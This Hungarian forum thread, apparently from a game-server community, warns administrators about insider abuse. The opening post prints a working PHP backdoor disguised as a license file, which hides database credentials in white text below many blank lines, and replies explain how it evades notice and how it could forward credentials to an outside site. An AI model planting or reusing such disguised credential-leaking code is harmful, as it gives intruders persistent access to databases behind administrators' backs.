Sziasztok ( nem tudom hogy jó helyre írok-e, nem tudom sehova sem berakni ),
Gondoltam megnyitom ezt a topikot, hiszen nagyon sok szerveren a következőkben majd leírásra kerülő események mennek végbe.
1. Weboldal és védelme.
Először is a weboldal, vagy valamilyen eleme BIZTOSAN KOMMUNIKÁL az SQL Szerverrel.
És ahol kommunikáció van ott van felhasználónév és jelszó is.
A különböző CMS-ekben is természetesen meg kell adni ezt a felhasználónevet és jelszót amit persze VÁLTOZÓKBAN fog elmenteni valószínüleg config.php néven :).
Jól vigyázz, nehogy az egyik "weboldalért felelős" alkalmazottad egy új php file-t telepítsen az oldalra!
mutatok egy példát:
<?php
include "config.php";
echo "7e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e26988957e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f167e430d0e2698895cbb4a00ddc0721f16 \n";
$string = "\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r\r\n\n\r\n\r$db_user\r\n$db_pass\n\r$db_host\n\r";
echo nl2br("<font color='white'>$string</font>");
?>
Jelen esetben egy License.php néven lementett PHP-ról beszélek.
Az include része annyit tesz hogy bekéri azt a bizonyos filet, jelen esetben a "config.php"-t.
Mint már említettem változókban vannak elmentve a belépési adatok a config.php-ban ( $változó="felhasználó" és egyebek ).
jelen esetben a változó $db_user,$db_pass,$db_host == Felhasználónév,jelszó, host.
Ezek nélkül nem nagyon tudnánk belépni phpmyadminba.
Ebben a php-ban megjelenítjük a kódmaszlagot a "licenszkódot" és eltűntetjük fehér betűszínnel a nekünk fontos részét sok-sok enterrel lejjebb.
Így bármikor átírja a Főadmin a jelszót, esetleg a felhasználónevet is, A kedves telepítő mindig értesülni fog róla.
2. Parancsok levédése a szerveren.
A másik közkedvelt gyerekjáték a szerver tönkretétele GM-ként...
Igen ehhez is egy bizonyos korosztály alatt kell gondolkodni...
A lényeg: Vannak különleges aurákkal és spellekkel rendelkező NPC-k és különleges Objektumok is a játékon belül, amiből ha sokat rakunk le akár a szerver életébe is kerülhet.
Vagy a másik eshetőség, letöröl minden npc-t és töröl minden fontosabb objektumot.
Ezt igazából nem nagyon lehet kivédeni, ha valakinek elborul az agya, az egyből Macróval rakosgatja a lényeket vagy a tárgyakat.
Védekezés: Ne adj a próbaidős GMjeidnek gobject add/del és npc add/del parancsot.
Hali!
Biztos
azért írtam így, mert nem egy egyszerhasználatos kódot akartam bemutatni,
Ez a kód úgy néz ki ha megnyitod mintha egy sima Licensekód lenne.
és azért írtam ennyi sor és szakasztörést alulra hogy ha kijelölné is a főadmin, akkor se jöjjön rá hogy kb 20 sorral lejjebb ottvan a kikért változó fehéren.
az admin is bele nézne a forráskódba, legalábbis nekem ez lenne az első dolgom, így nyilván semmit nem ér, na m1
Idézetet írta: $0undX Dátum 2011 november 13, 06:37:05 DÉLUTÁN
az admin is bele nézne a forráskódba, legalábbis nekem ez lenne az első dolgom, így nyilván semmit nem ér, na m1
Nem is azokhoz szólt akik rendelkeznek egy általános tudással... :)
Idézetet írta: Sunny Dátum 2011 november 13, 07:46:17 DÉLUTÁN
Idézetet írta: $0undX Dátum 2011 november 13, 06:37:05 DÉLUTÁN
az admin is bele nézne a forráskódba, legalábbis nekem ez lenne az első dolgom, így nyilván semmit nem ér, na m1
Nem is azokhoz szólt akik rendelkeznek egy általános tudással... :)
Én is pont ezt akartam írni.
Üdv.: Senki
így van egyébként a rutinosabbak már nem is olvasgatnak csak törölnek :D
Idézetet írta: Sunny Dátum 2011 november 13, 12:01:52 DÉLUTÁN
azért írtam így, mert nem egy egyszerhasználatos kódot akartam bemutatni,
Ez a kód úgy néz ki ha megnyitod mintha egy sima Licensekód lenne.
és azért írtam ennyi sor és szakasztörést alulra hogy ha kijelölné is a főadmin, akkor se jöjjön rá hogy kb 20 sorral lejjebb ottvan a kikért változó fehéren.
hat ez nagyon trukkos.. azt hiszem nem az elso eset volt, hogy valaki igy probalja a forraskodjat eltuntettni :)
Veled mar tortent ilyen apropo?
Hogyan lehet telepiteni php-t? lehet fwrite-al kell legeneralni php fajlt? akkor nem is kell ftp hozzaferes :)
ahol meg nincs mysql_real_escape, ott segit magic quote.. bar regi mint az orszagut
aki meg nem bizik magic quote-ba vagy mysql_real_escape be annak itt
(http://images.icanhascheezburger.com/completestore/2009/5/5/128860144659186148.jpg)
Sziasztok!
Akkor most mit is kell csinálni és mit hova kell berakni mert elolvastam és volt minden de a lényeg nem !:D
hali!
Ez csak egy példa volt a sok közül hogy hogyan lehet átvenni a hatalmat a vezetőtől egy hozzá értőnek :)
nagyon sok féle képpen meg lehet ezt oldani én már láttam olyan kiépített rendszert is ami már a gépre is kihatott ( trójai ) és így újra és újra vissza tudta írni az sql jelszót.
Tehát csak tessék vigyázni :)
óh már értem :) , és olyan védelem van azer cmsre ami hatásos?, gondolok itt feltörésre
igazából azért nincs egyik CMS-re sem védelem mert mindegyik 1 bizonyos CONFIG file-al dolgozik. amit változóban ment amit pedig meg lehet hívni 1 másik PHP-val :)
Tehát ha BÁRHOL a szerveren ( htdocs/ ) van 1 config file és az mindig VALÓS akkor akinek van FTP-je és 1 kis php tudása az bárhova létrehozhat 1 másik PHP file-t ami meghívja ezt a változót és továbbküldi. vagy akár beleírhatja valamelyik file-ba ami még kevésbé észrevehetőbb és elküldi 1 külső ( például valami.atw.hu ) webhelyre. te szépen rámész ott kiírja és megint be tudsz lépni sql-be ahonnan elérsz mindent.
Én ezért mondom hogy a bizalom a legfontosabb :)
nemtudom, hogy kell pluszt adni , de adok :D +1 , am akkor már értem a téma jellegét :D ezek után!